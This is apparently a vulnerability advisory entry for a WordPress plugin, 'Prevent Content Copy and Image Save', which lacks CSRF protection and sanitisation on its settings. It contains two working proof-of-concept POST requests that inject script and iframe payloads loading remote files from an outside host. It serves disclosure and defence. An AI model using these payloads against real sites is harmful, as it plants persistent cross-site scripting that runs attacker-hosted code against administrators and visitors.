The plugin does not check for CSRF when saving its settings, not perform any validation and sanitisation on them, allowing attackers to make a logged in administrator set arbitrary XSS payloads in them.
### -- [ PoC #1 | Authenticated Persistent XSS & XFS | Image saving disabled message text: ] [!] POST /wp-admin/options-general.php?page=Prevent_Content_Copy_and_Image_Save.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 228 Cookie: [admin cookies] select=1&CTRLA=1&CTRLC=1&CTRLX=1&CTRLV=1&CTRLINPUT=1&saveimg=1&image_save_msg=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E&CTRLS=1&cmenu=1&no_menu_msg=PoC+by+m0ze&Save_Options=++Update+Options++ ### -- [ PoC #2 | Authenticated Persistent XSS & XFS | Context menu disabled message text: ] [!] POST /wp-admin/options-general.php?page=Prevent_Content_Copy_and_Image_Save.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 234 Cookie: [admin cookies] select=1&CTRLA=1&CTRLC=1&CTRLX=1&CTRLV=1&CTRLINPUT=1&saveimg=1&image_save_msg=PoC+by+m0ze&CTRLS=1&cmenu=1&no_menu_msg=%22%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E&Save_Options=++Update+Options++
YouTube Video
m0ze
m0ze
Yes
2021-04-12 (about 1 years ago)
2021-05-17 (about 1 years ago)
2021-05-24 (about 1 years ago)